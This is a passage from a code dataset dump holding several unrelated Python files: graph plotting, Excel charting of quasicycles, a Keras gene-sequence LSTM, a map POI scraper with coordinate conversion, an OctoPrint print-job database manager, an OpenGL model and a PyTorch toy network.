plt.savefig(\"weighted_graph.png\") # save as png\n\n# legend\n# props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n# ax.text(-0.15, 0.95, textstr, transform=ax.transAxes,\n# fontsize=12, verticalalignment='top', bbox=props)\n# plt.axis('off')\n\n# write to file in gexf format, gephi is much better for plotting networks\nmst = nx.minimum_spanning_tree(G)\nws = nx.get_edge_attributes(mst, 'weight')\nfor key, value in ws.items():\n ws[key] = 1 - value * value / 2\nnx.set_edge_attributes(mst, 'weight', ws)\nnx.set_node_attributes(mst, \"label\", labels)\nnx.relabel_gexf_graph(mst)\nnx.write_gexf(mst, \"mst_courses.gexf\")\n\nplt.show() # display\n","sub_path":"mst_mds.py","file_name":"mst_mds.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"274932645","text":"from openpyxl.chart import Reference, ScatterChart, LineChart, BarChart, Series\nfrom quasicycle import Quasicycle\nimport numpy as np\nfrom sklearn.cluster import MeanShift, KMeans\nimport matplotlib.pyplot as plt\n\n\ndef import_source_data(workbook, source_sheet, config):\n col = 1\n while True:\n if source_sheet.cell(row=1, column=col).value == config.source_col:\n break\n col += 1\n if config.output_sheet in workbook.sheetnames:\n workbook.remove_sheet(workbook.get_sheet_by_name(config.output_sheet))\n workbook.create_sheet(config.output_sheet)\n output_sheet = workbook[config.output_sheet]\n i = config.start_row\n while source_sheet.cell(row=i + 1, column=col).value is not None:\n output_sheet.cell(i, 1).value = float(source_sheet.cell(i + 1, col).value)\n i += 1\n\n\ndef create_diagram(quasicycle, height=7, width=10, style=11):\n chart = ScatterChart()\n chart.title = quasicycle.name\n chart.height = height\n chart.width = width\n chart.x_axis.title = ''\n chart.y_axis.title = ''\n chart.legend = None\n rows_reference = Reference(quasicycle.sheet, min_col=quasicycle.start_cell_col,\n min_row=quasicycle.start_cell_row, max_row=quasicycle.start_cell_row + quasicycle.size)\n cols_reference = Reference(quasicycle.sheet, min_col=quasicycle.start_cell_col + 1,\n min_row=quasicycle.start_cell_row, max_row=quasicycle.start_cell_row + quasicycle.size)\n series = Series(cols_reference, rows_reference, title_from_data=False)\n chart.layoutTarget = \"inner\"\n chart.style = style\n chart.series.append(series)\n return chart\n\n\ndef create_bar_chart(sheet, start_row, size):\n bar_chart = BarChart()\n bar_chart.type = \"col\"\n bar_chart.style = 10\n bar_chart.title = \"Память квазициклов\"\n bar_chart.y_axis.title = 'Память'\n bar_chart.x_axis.title = 'Квазициклы'\n data = Reference(sheet, min_col=2, min_row=start_row - 1, max_row=start_row + size)\n indexes = Reference(sheet, min_col=1, min_row=start_row, max_row=start_row + size)\n bar_chart.add_data(data, titles_from_data=True)\n bar_chart.set_categories(indexes)\n bar_chart.shape = 4\n bar_chart.legend = None\n return bar_chart\n\n\ndef calculate_derivative(sheet, config):\n sheet.cell(1, 1).value = \"Временной ряд\"\n sheet.cell(1, 2).value = \"Приращение\"\n sheet.cell(1, 3).value = \"Сдвиг\"\n current_row = config.start_row\n while sheet.cell(current_row + 1, config.start_col).value is not None:\n sheet.cell(current_row, config.start_col + 1).value = sheet.cell(current_row + 1, config.start_col).value \\\n - sheet.cell(current_row, config.start_col).value\n current_row += 1\n current_row = config.start_row\n while sheet.cell(current_row + 1, config.start_col + 1).value is not 
None:\n sheet.cell(current_row, config.start_col + 2).value = sheet.cell(current_row + 1, config.start_col + 1).value\n current_row += 1\n\n\ndef distance(point1, point2):\n square_x = (point2[0] - point1[0]) ** 2\n square_y = (point2[1] - point1[1]) ** 2\n dist = (square_x + square_y) ** 0.5\n return dist\n\n\ndef check_near(points_list, time_check, position, next_num, min_value):\n while time_check != 0:\n try:\n if distance(points_list[position], points_list[position + next_num + 1]) < min_value:\n min_value = distance(points_list[position], points_list[position + next_num + 1])\n next_num += 1\n time_check -= 1\n except IndexError:\n break\n return min_value, next_num\n\n\ndef get_quasicycles(sheet, config):\n quasicycles = []\n points_list = []\n row = config.start_row\n while sheet.cell(row, 3).value is not None:\n points_list.append([sheet.cell(row, 2).value, sheet.cell(row, 3).value])\n row += 1\n position = 0\n q_index = 1\n while position + config.min_size < len(points_list) - 1:\n q_size = config.min_size\n min_value = distance(points_list[position], points_list[q_size + position])\n time_check = 3\n min_value, q_size = check_near(points_list, time_check, position, q_size, min_value)\n if q_size == q_size + time_check:\n while distance(points_list[position], points_list[position + q_size + 1]) < min_value:\n min_value = distance(points_list[position], points_list[position + q_size])\n q_size += 1\n quasicycles.append(Quasicycle(sheet, \"Квазицикл \" + str(q_index), position + config.start_row, 2, q_size))\n position = position + q_size + 1\n q_index += 1\n return quasicycles\n\n\ndef create_squares_graph(quasicycles):\n sort_quasi = []\n order = 1\n for quasicycle in quasicycles:\n sort_quasi.append([order, quasicycle.square])\n order += 1\n sort_quasi = np.array(sort_quasi)\n sort_quasi.reshape(2, order - 1)\n k_means = KMeans(n_clusters=3)\n k_means.fit(sort_quasi)\n y_k_means = k_means.predict(sort_quasi)\n fig, ax = plt.subplots()\n ax.scatter(sort_quasi[:, 0], sort_quasi[:, 1], c=y_k_means, s=50, cmap='viridis')\n plt.title('График движений площадей прямоугольников')\n plt.xlabel('Номер квазицикла')\n plt.ylabel('Площадь квазицикла')\n fig.savefig('squares.png')\n # plt.show()\n","sub_path":"libs.py","file_name":"libs.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"391449554","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport numpy\r\nimport numpy as np\r\nimport csv\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten, Activation, LSTM\r\nfrom keras.layers.convolutional import Convolution2D\r\nfrom keras.layers.convolutional import MaxPooling2D\r\nfrom keras.optimizers import SGD\r\nfrom sklearn.cross_validation import train_test_split\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import np_utils\r\nfrom keras import optimizers\r\n# fix random seed for reproducibility\r\nseed = 7\r\nnumpy.random.seed(seed)\r\n# load data\r\ndataset=csv.reader(open('train.csv','r'))\r\n\r\n#print dataset\r\nX_train= np.zeros((2000,14))\r\nY_train= np.zeros((2000,1))\r\nj=0\r\nfor data in dataset:\r\n if j>=1: \r\n temp= data[1]\r\n #print (temp)\r\n Y_train[j-1]=data[2]\r\n i=0\r\n for element in temp:\r\n #print (element)\r\n if element=='A':\r\n X_train[j-1][i]=-1\r\n i=i+1\r\n if element=='C':\r\n X_train[j-1][i]=-0.5\r\n i=i+1\r\n if element=='G':\r\n 
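The distance helper in the libs record above spells out the 2-D Euclidean formula by hand; math.hypot expresses the same computation directly. A sketch, assuming the points are (x, y) pairs:

import math

def distance(point1, point2):
    # Equivalent to sqrt((x2 - x1)**2 + (y2 - y1)**2)
    return math.hypot(point2[0] - point1[0], point2[1] - point1[1])

assert distance((0, 0), (3, 4)) == 5.0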
X_train[j-1][i]=0.5\r\n i=i+1\r\n if element=='T':\r\n X_train[j-1][i]=1\r\n i=i+1\r\n j=j+1 \r\n# ACGT\r\nx= np.zeros((2000,14,1))\r\ny= np.zeros((2000,1))\r\nindices = np.arange(2000)# indices = the number of images in the source data set \r\nnp.random.shuffle(indices) \r\nfor i in indices: \r\n x[i,:,0] = X_train[i,:] \r\n y[i] =Y_train[i] \r\n \r\n#k=0\r\n#while k<1000000:\r\n# l=random.randint(0, 1999)\r\n# m=random.randint(0, 1999)\r\n# if l !=m:\r\n # Y_train[l], Y_train[m]=Y_train[m], Y_train[l]\r\n # X_train[l,:], X_train[m,:]=X_train[m,:], X_train[l,:]\r\n #k=k+1\r\n#dataset = numpy.loadtxt(\"train.csv\", delimiter=\",\")\r\n# reshape to be [samples][pixels][width][height]\r\n#rmsprop=optimizers.RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.0)\r\n#sgd = SGD(lr=0.15, decay=1e-6, momentum=0, nesterov=True)\r\ndef SimpleMLP_model():\r\n\t# create model\r\n model = Sequential()\r\n model.add(LSTM(2, input_shape=(14,1))) \r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.35))\r\n model.add(Dense(1))\r\n model.add(Activation('sigmoid'))\r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n return model\r\n\r\nmodel = SimpleMLP_model()\r\nM=1800\r\nhistory=model.fit(x[0:M,:,:], y[0:M],validation_data=(x[M+1:1999,:,:], y[M+1:1999]), nb_epoch=1000, batch_size=50)\r\n#history=model.fit(X_train[0:M,:], Y_train[0:M],validation_data=(X_train[M+1:1999,:], Y_train[M+1:1999]), nb_epoch=50, batch_size=1)\r\n#scores = model.evaluate(X_test, y_test, verbose=0)\r\n#print(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\r\nmodel.save('gene.h5') \r\n\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.legend(['train','validation'], loc='upper right')\r\nplt.title('binary_crossentropy')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.show()\r\n\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.legend(['train','validation'], loc='lower right')\r\nplt.title('accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.show()","sub_path":"Gene_LSTM.py","file_name":"Gene_LSTM.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"3525945","text":"\r\nimport urllib.request\r\nimport json\r\nimport math\r\n\r\napikey='254bfd619e12538e278002388d0e2564'\r\npolygon_range='114.048818088108,22.548716905382|114.048855523004,22.528410644532|114.06902859158,22.528449164497|114.068712565105,22.548912760417|114.048818088108,22.548716905382'\r\nkeywords=''\r\nPOI_types='050300' #change here to get diffrent types of poi\r\n\r\noffset='20'\r\ndisplayed_page='1'\r\nextension='base'\r\noutputfile=POI_types+'.txt'\r\n\r\n#for coordinate system transformation\r\nx_pi = 3.14159265358979324 * 3000.0 / 180.0\r\npi = 3.1415926535897932384626 # π\r\na = 6378245.0 # 长半轴\r\nee = 0.00669342162296594323 # 扁率\r\n\r\n#get full url to request api\r\ndef url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,displayed_page,extension):\r\n fullurl='http://restapi.amap.com/v3/place/polygon?key='+apikey+'&polygon='+polygon_range+'&keywords='+keywords+'&types='+POI_types+'&offset='+offset+'&page='+displayed_page+'&extensions='+extension\r\n return fullurl\r\n\r\n#send a request, and get result\r\ndef request_result(url):\r\n response = urllib.request.urlopen(url, timeout=1)\r\n html = response.read()\r\n decode_html = html.decode('utf-8')\r\n result = json.loads(decode_html)\r\n status=result['status']\r\n if 
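The Gene_LSTM record above encodes the bases A/C/G/T as -1/-0.5/0.5/1 through a chain of ifs. A table-driven sketch of the same encoding (the helper name is illustrative), which also skips unexpected characters cleanly:

import numpy as np

BASE_VALUES = {'A': -1.0, 'C': -0.5, 'G': 0.5, 'T': 1.0}

def encode_sequence(seq, length=14):
    # Map each base to its numeric code; unknown characters are skipped.
    codes = [BASE_VALUES[b] for b in seq if b in BASE_VALUES]
    return np.array(codes[:length])

assert list(encode_sequence("ACGT")) == [-1.0, -0.5, 0.5, 1.0]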
status=='0':\r\n print('failed to get poi')\r\n\r\n return result\r\n#check number of pages\r\ndef get_pagenumber(result,offset):\r\n pageset=int(offset)\r\n count =result['count']\r\n count_number=int(count)\r\n if (count_number%pageset)==0:\r\n pagenumber=int(count_number/pageset)\r\n else:\r\n pagenumber = int(count_number /pageset) + 1\r\n return pagenumber\r\n\r\n#get longitude and latitude from a string\r\ndef getlongitude(location):\r\n\r\n List_longitude=[]\r\n List_location=list(location)\r\n\r\n for charecter in List_location:\r\n\r\n if (charecter==','):\r\n locationnumber=List_location.index(charecter)\r\n\r\n List_longitude=List_location[:locationnumber]\r\n\r\n break\r\n longitude=''.join(List_longitude)\r\n float_longitude=float(longitude)\r\n return float_longitude\r\n\r\ndef getlatitude(location):\r\n\r\n List_latitude=[]\r\n List_location=list(location)\r\n for charecter in List_location:\r\n if (charecter==','):\r\n locationnumber=List_location.index(charecter)\r\n List_latitude=List_location[locationnumber+1:]\r\n\r\n break\r\n latitude=''.join(List_latitude)\r\n float_latitude=float(latitude)\r\n return float_latitude\r\n\r\n#transform coordinate system\r\ndef gcj02towgs84(lng, lat):\r\n \"\"\"\r\n GCJ02(火星坐标系)转GPS84\r\n :param lng:火星坐标系的经度\r\n :param lat:火星坐标系纬度\r\n :return:\r\n \"\"\"\r\n\r\n dlat = transformlat(lng - 105.0, lat - 35.0)\r\n dlng = transformlng(lng - 105.0, lat - 35.0)\r\n radlat = lat / 180.0 * pi\r\n magic = math.sin(radlat)\r\n magic = 1 - ee * magic * magic\r\n sqrtmagic = math.sqrt(magic)\r\n dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)\r\n dlng = (dlng * 180.0) / (a / sqrtmagic * math.cos(radlat) * pi)\r\n mglat = lat + dlat\r\n mglng = lng + dlng\r\n return [lng * 2 - mglng, lat * 2 - mglat]\r\n\r\ndef transformlat(lng, lat):\r\n ret = -100.0 + 2.0 * lng + 3.0 * lat + 0.2 * lat * lat + \\\r\n 0.1 * lng * lat + 0.2 * math.sqrt(math.fabs(lng))\r\n ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 *\r\n math.sin(2.0 * lng * pi)) * 2.0 / 3.0\r\n ret += (20.0 * math.sin(lat * pi) + 40.0 *\r\n math.sin(lat / 3.0 * pi)) * 2.0 / 3.0\r\n ret += (160.0 * math.sin(lat / 12.0 * pi) + 320 *\r\n math.sin(lat * pi / 30.0)) * 2.0 / 3.0\r\n return ret\r\n\r\ndef transformlng(lng, lat):\r\n ret = 300.0 + lng + 2.0 * lat + 0.1 * lng * lng + \\\r\n 0.1 * lng * lat + 0.1 * math.sqrt(math.fabs(lng))\r\n ret += (20.0 * math.sin(6.0 * lng * pi) + 20.0 *\r\n math.sin(2.0 * lng * pi)) * 2.0 / 3.0\r\n ret += (20.0 * math.sin(lng * pi) + 40.0 *\r\n math.sin(lng / 3.0 * pi)) * 2.0 / 3.0\r\n ret += (150.0 * math.sin(lng / 12.0 * pi) + 300.0 *\r\n math.sin(lng / 30.0 * pi)) * 2.0 / 3.0\r\n return ret\r\n\r\n\r\n#first request, a test request to get page number\r\nurl=url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,displayed_page,extension)\r\nresult=request_result(url)\r\npagenumber=get_pagenumber(result,offset)\r\nprint(pagenumber)\r\n\r\n#formal start, and record\r\nwith open(outputfile,'w',encoding='utf-8') as text_file:\r\n\r\n for i in range(pagenumber):\r\n row_count=0\r\n page=i+1\r\n str_page=str(page)\r\n url=url_amap_polygon(apikey,polygon_range,keywords,POI_types,offset,str_page,extension)\r\n result=[]\r\n result=request_result(url)\r\n\r\n for item in result['pois']:\r\n jname=item['name']\r\n jtypecode=item['typecode']\r\n jaddress=item['address']\r\n jlocation=item['location']\r\n jlon=getlongitude(jlocation)\r\n jlat=getlatitude(jlocation)\r\n wgs84location=gcj02towgs84(jlon,jlat)\r\n wgs84lon=wgs84location[0]\r\n 
wgs84lat=wgs84location[1]\r\n\r\n print(jname,'!',jtypecode,'!',jaddress,'!',wgs84lon,'!',wgs84lat,file=text_file) # ! to separate text into columns in excel\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":".gitignore/testPOI.py","file_name":"testPOI.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"335302702","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nimport logging\nimport os\nimport sqlite3\n\nfrom octoprint_PrintJobHistory.WrappedLoggingHandler import WrappedLoggingHandler\nfrom octoprint_PrintJobHistory.models.FilamentModel import FilamentModel\nfrom octoprint_PrintJobHistory.models.PrintJobModel import PrintJobModel\nfrom octoprint_PrintJobHistory.models.PluginMetaDataModel import PluginMetaDataModel\nfrom octoprint_PrintJobHistory.models.TemperatureModel import TemperatureModel\nfrom peewee import *\n\n\nFORCE_CREATE_TABLES = False\nSQL_LOGGING = True\n\nCURRENT_DATABASE_SCHEME_VERSION = 1\n\n# List all Models\nMODELS = [PluginMetaDataModel, PrintJobModel, FilamentModel, TemperatureModel]\n\n\nclass DatabaseManager(object):\n\n\tdef __init__(self, parentLogger):\n\t\tself._logger = logging.getLogger(parentLogger.name + \".\" + self.__class__.__name__)\n\t\tself._sqlLogger = logging.getLogger(parentLogger.name + \".\" + self.__class__.__name__ + \".SQL\")\n\n\t\tself._database = None\n\t\tself._databaseFileLocation = None\n\t\tself._sendDataToClient = None\n\n\t################################################################################################## private functions\n\n\tdef _createOrUpgradeSchemeIfNecessary(self):\n\t\tschemeVersionFromDatabaseModel = None\n\t\ttry:\n\t\t\tschemeVersionFromDatabaseModel = PluginMetaDataModel.get(PluginMetaDataModel.key == PluginMetaDataModel.KEY_DATABASE_SCHEME_VERSION)\n\t\t\tpass\n\t\texcept Exception as e:\n\t\t\terrorMessage = e.message\n\t\t\tif errorMessage.startswith(\"no such table\"):\n\n\t\t\t\tself._logger.info(\"Creating database tables, because they didn't exist\")\n\t\t\t\tself._createDatabaseTables()\n\t\t\telse:\n\t\t\t\tself._logger.error(str(e))\n\n\t\tif schemeVersionFromDatabaseModel is not None:\n\t\t\tcurrentDatabaseSchemeVersion = int(schemeVersionFromDatabaseModel.value)\n\t\t\tif (currentDatabaseSchemeVersion < CURRENT_DATABASE_SCHEME_VERSION):\n\t\t\t\t# evaluate upgrade steps (from 1-2, 1...6)\n\t\t\t\tself._logger.info(\"We need to upgrade the database scheme from: '\" + str(currentDatabaseSchemeVersion) + \"' to: '\" + str(CURRENT_DATABASE_SCHEME_VERSION) + \"'\")\n\t\t\t\tself._logger.info(\"...not needed/implemented...\")\n\t\t\t\tpass\n\t\tpass\n\n\t\t# databaseSchemeVersion = PluginMetaDataEntity.getDatabaseSchemeVersion(cursor)\n\t\t# if databaseSchemeVersion == None or FORCE_CREATE_TABLES == True:\n\t\t# \tself._createCurrentTables(cursor, FORCE_CREATE_TABLES)\n\t\t# else:\n\t\t# \t# check from which version we need to upgrade\n\t\t# \t#\tsql\n\t\t# \tpass\n\tdef _createDatabaseTables(self):\n\t\tself._database.connect(reuse_if_open=True)\n\t\tself._database.drop_tables(MODELS)\n\t\tself._database.create_tables(MODELS)\n\n\t\tPluginMetaDataModel.create(key=PluginMetaDataModel.KEY_DATABASE_SCHEME_VERSION, value=CURRENT_DATABASE_SCHEME_VERSION)\n\t\tself._database.close()\n\t\tself._logger.info(\"Database tables created\")\n\n\t################################################################################################### public functions\n\t# databasePath 
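getlongitude and getlatitude in the testPOI record above scan the 'lon,lat' string character by character to find the comma; str.split does the same job in two lines. A sketch of that alternative (the function name is illustrative):

def parse_location(location):
    # "114.05,22.54" -> (114.05, 22.54)
    lon_text, lat_text = location.split(',')
    return float(lon_text), float(lat_text)

assert parse_location("114.05,22.54") == (114.05, 22.54)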
'/Users/o0632/Library/Application Support/OctoPrint/data/PrintJobHistory'\n\tdef initDatabase(self, databasePath, sendErrorMessageToClient):\n\t\tself._logger.info(\"Init DatabaseManager\")\n\t\tself.sendErrorMessageToClient = sendErrorMessageToClient\n\t\tself._databaseFileLocation = os.path.join(databasePath, \"printJobHistory.db\")\n\n\t\tself._logger.info(\"Creating database in: \" + str(self._databaseFileLocation))\n\t\tif SQL_LOGGING == True:\n\t\t\timport logging\n\t\t\tlogger = logging.getLogger('peewee')\n\t\t\t# we need only the single logger without parent\n\t\t\tlogger.parent = None\n\t\t\t# logger.addHandler(logging.StreamHandler())\n\t\t\t# activate SQL logging on PEEWEE side and on PLUGIN side\n\t\t\tlogger.setLevel(logging.DEBUG)\n\t\t\tself._sqlLogger.setLevel(logging.DEBUG)\n\n\t\t\twrappedHandler = WrappedLoggingHandler(self._sqlLogger)\n\t\t\tlogger.addHandler(wrappedHandler)\n\n\t\tself._createDatabase(FORCE_CREATE_TABLES)\n\n\t\tpass\n\n\tdef _createDatabase(self, forceCreateTables):\n\t\tself._database = SqliteDatabase(self._databaseFileLocation)\n\t\tDatabaseManager.db = self._database\n\t\tself._database.bind(MODELS)\n\n\t\tif forceCreateTables:\n\t\t\tself._logger.info(\"Creating new database-tables, because FORCE == TRUE!\")\n\t\t\tself._createDatabaseTables()\n\t\telse:\n\t\t\t# check, if we need an scheme upgrade\n\t\t\tself._logger.info(\"Check if database-scheme upgrade needed.\")\n\t\t\tself._createOrUpgradeSchemeIfNecessary()\n\t\tself._logger.info(\"Done DatabaseManager\")\n\n\n\tdef getDatabaseFileLocation(self):\n\t\treturn self._databaseFileLocation\n\n\tdef recreateDatabase(self):\n\t\tself._createDatabase(True)\n\n\tdef insertPrintJob(self, printJobModel):\n\t\tdatabaseId = None\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\tprintJobModel.save()\n\t\t\t\tdatabaseId = printJobModel.get_id()\n\t\t\t\t# save all relations\n\t\t\t\t# - Filament\n\t\t\t\tfor filamentModel in printJobModel.getFilamentModels():\n\t\t\t\t\tfilamentModel.printJob = printJobModel\n\t\t\t\t\tfilamentModel.save()\n\t\t\t\t# - Temperature\n\t\t\t\tfor temperatureModel in printJobModel.getTemperatureModels():\n\t\t\t\t\ttemperatureModel.printJob = printJobModel\n\t\t\t\t\ttemperatureModel.save()\n\t\t\t\t# do expicit commit\n\t\t\t\ttransaction.commit()\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not insert printJob into database:\" + str(e))\n\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not insert the printjob into the database. 
See OctoPrint.log for details!\")\n\t\t\tpass\n\n\t\treturn databaseId\n\n\tdef updatePrintJob(self, printJobModel):\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\tprintJobModel.save()\n\t\t\t\tdatabaseId = printJobModel.get_id()\n\t\t\t\t# save all relations\n\t\t\t\t# - Filament\n\t\t\t\tfor filamentModel in printJobModel.getFilamentModels():\n\t\t\t\t\tfilamentModel.save()\n\n\t\t\t\t# # - Temperature\n\t\t\t\t# for temperatureModel in printJobModel.getTemperatureModels():\n\t\t\t\t# \ttemperatureModel.printJob = printJobModel\n\t\t\t\t# \ttemperatureModel.save()\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not update printJob into database:\" + str(e))\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not update the printjob ('\"+ printJobModel.fileName +\"') into the database. See OctoPrint.log for details!\")\n\t\t\tpass\n\n\tdef countPrintJobsByQuery(self, tableQuery):\n\n\t\tfilterName = tableQuery[\"filterName\"]\n\n\t\tmyQuery = PrintJobModel.select()\n\t\tif (filterName == \"onlySuccess\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult == \"success\")\n\t\telif (filterName == \"onlyFailed\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult != \"success\")\n\n\t\treturn myQuery.count()\n\n\n\tdef loadPrintJobsByQuery(self, tableQuery):\n\t\toffset = int(tableQuery[\"from\"])\n\t\tlimit = int(tableQuery[\"to\"])\n\t\tsortColumn = tableQuery[\"sortColumn\"]\n\t\tsortOrder = tableQuery[\"sortOrder\"]\n\t\tfilterName = tableQuery[\"filterName\"]\n\n\t\tmyQuery = PrintJobModel.select().offset(offset).limit(limit)\n\t\tif (filterName == \"onlySuccess\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult == \"success\")\n\t\telif (filterName == \"onlyFailed\"):\n\t\t\tmyQuery = myQuery.where(PrintJobModel.printStatusResult != \"success\")\n\n\t\tif (\"printStartDateTime\" == sortColumn):\n\t\t\tif (\"desc\" == sortOrder):\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.printStartDateTime.desc())\n\t\t\telse:\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.printStartDateTime)\n\t\tif (\"fileName\" == sortColumn):\n\t\t\tif (\"desc\" == sortOrder):\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.fileName.desc())\n\t\t\telse:\n\t\t\t\tmyQuery = myQuery.order_by(PrintJobModel.fileName)\n\t\treturn myQuery\n\n\tdef loadAllPrintJobs(self):\n\t\treturn PrintJobModel.select().order_by(PrintJobModel.printStartDateTime.desc())\n\n\t\t# return PrintJobModel.select().offset(offset).limit(limit).order_by(PrintJobModel.printStartDateTime.desc())\n\t\t# all = PrintJobModel.select().join(FilamentModel).switch(PrintJobModel).join(TemperatureModel).order_by(PrintJobModel.printStartDateTime.desc())\n\t\t# allDict = all.dicts()\n\t\t# result = prefetch(allJobsQuery, FilamentModel)\n\t\t# return result\n\t\t# return allDict\n\n\tdef loadPrintJob(self, databaseId):\n\t\treturn PrintJobModel.get_by_id(databaseId)\n\n\tdef deletePrintJob(self, databaseId):\n\n\n\t\twith self._database.atomic() as transaction: # Opens new transaction.\n\t\t\ttry:\n\t\t\t\t# first delete relations\n\t\t\t\tn = FilamentModel.delete().where(FilamentModel.printJob == databaseId).execute()\n\t\t\t\tn = TemperatureModel.delete().where(TemperatureModel.printJob == 
databaseId).execute()\n\n\t\t\t\tPrintJobModel.delete_by_id(databaseId)\n\t\t\texcept Exception as e:\n\t\t\t\t# Because this block of code is wrapped with \"atomic\", a\n\t\t\t\t# new transaction will begin automatically after the call\n\t\t\t\t# to rollback().\n\t\t\t\ttransaction.rollback()\n\t\t\t\tself._logger.exception(\"Could not delete printJob from database:\" + str(e))\n\n\t\t\t\tself.sendErrorMessageToClient(\"DatabaseManager\", \"Could not delete the printjob ('\"+ str(databaseId) +\"') from the database. See OctoPrint.log for details!\")\n\t\t\tpass\n","sub_path":"octoprint_PrintJobHistory/DatabaseManager.py","file_name":"DatabaseManager.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"487552714","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nimport movement\r\n\r\nangleMINE = 0\r\n\r\nCHANGE_COLOR = 0\r\nxx = 0\r\n\r\n\r\ndef set_c():\r\n global xx\r\n xx = 1\r\n\r\n\r\ndef x():\r\n global angleMINE, z, xx\r\n global CHANGE_COLOR\r\n z = movement.GetPosition()\r\n # missing: globals for the rotated values, if you move them here\r\n # + read the comment on the function after this one\r\n glColor3f(1, CHANGE_COLOR, CHANGE_COLOR)\r\n glTranslate(-z, 0.5, 0) # TRANSLATE IN RESPONSE TO\r\n glRotate(angleMINE, 0, 1, 0) # TO ROTATE\r\n glRotate(90, 1, 0, 0) # TO DRAW OUR TORUS IN WANTED VIEW (before this it was drawn upright instead of lying on the ground)\r\n\r\n glutSolidTorus(0.2, 1.2, 5, 5)\r\n\r\n glColor3f(1, 0, 0)\r\n if xx:\r\n glColor3f(0, 0, 0)\r\n glutSolidSphere(0.5, 10, 10)\r\n if 1 >= CHANGE_COLOR >= 0:\r\n CHANGE_COLOR += 0.05\r\n if CHANGE_COLOR >= 1:\r\n CHANGE_COLOR = 0\r\n angleMINE += 3 # HERE THE ANGLE TO ROTATE THE TORUS\r\n\r\n\r\ndef draw_model():\r\n # rotate is used here because above the model is drawn moving along x, while all our movement is along z\r\n # so any change above to the model's rotation on the road will use x instead of z, and it is picked up automatically here\r\n n = movement.getRotate()\r\n glRotate(n * 45, 0, 0, 1)\r\n glRotate(90, 0, 1, 0)\r\n x()\r\n","sub_path":"game/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"352025192","text":"# We don't know enough about neural networks.\n# In ind_datagen.py, I will construct some extremely simplified neural networks\n# and data sets to explore the properties of NN.\n#\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom torch.autograd import Variable\nimport torch.optim\nimport numpy as np\nfrom amne.amnesia import AverageMeter\nimport time\nimport pickle\n\n# Experiment 1\n# Dimension filtering\n\n\nclass Filter(nn.Module):\n def __init__(self):\n super(Filter, self).__init__()\n self.lin1=nn.Linear(100,100)\n self.lin2=nn.Linear(100,100)\n self.lin3=nn.Linear(100,1)\n\n def forward(self,input):\n\n x=self.lin1(input)\n x=F.relu(x)\n x=self.lin2(x)\n x=F.relu(x)\n x=self.lin3(x)\n return x\n\ndef train(data_loader,model,criterion,optimizer,epoch):\n end=time.time()\n for i,(input,target) in enumerate(data_loader):\n input=Variable(input.cuda())\n target=Variable(target.cuda())\n target=target.float()\n\n output=model(input)\n loss=criterion(output,target)\n batch_loss.update(loss.data[0],input.size(0))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n batch_time.update(time.time()-end)\n end=time.time()\n print_freq=10\n\n if i%print_freq==0:\n 
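insertPrintJob, updatePrintJob and deletePrintJob in the DatabaseManager record above all share one shape: open database.atomic(), write the parent row plus its relations, and roll back on any exception. A stripped-down sketch of that pattern with placeholder model and field names (not the plugin's real API):

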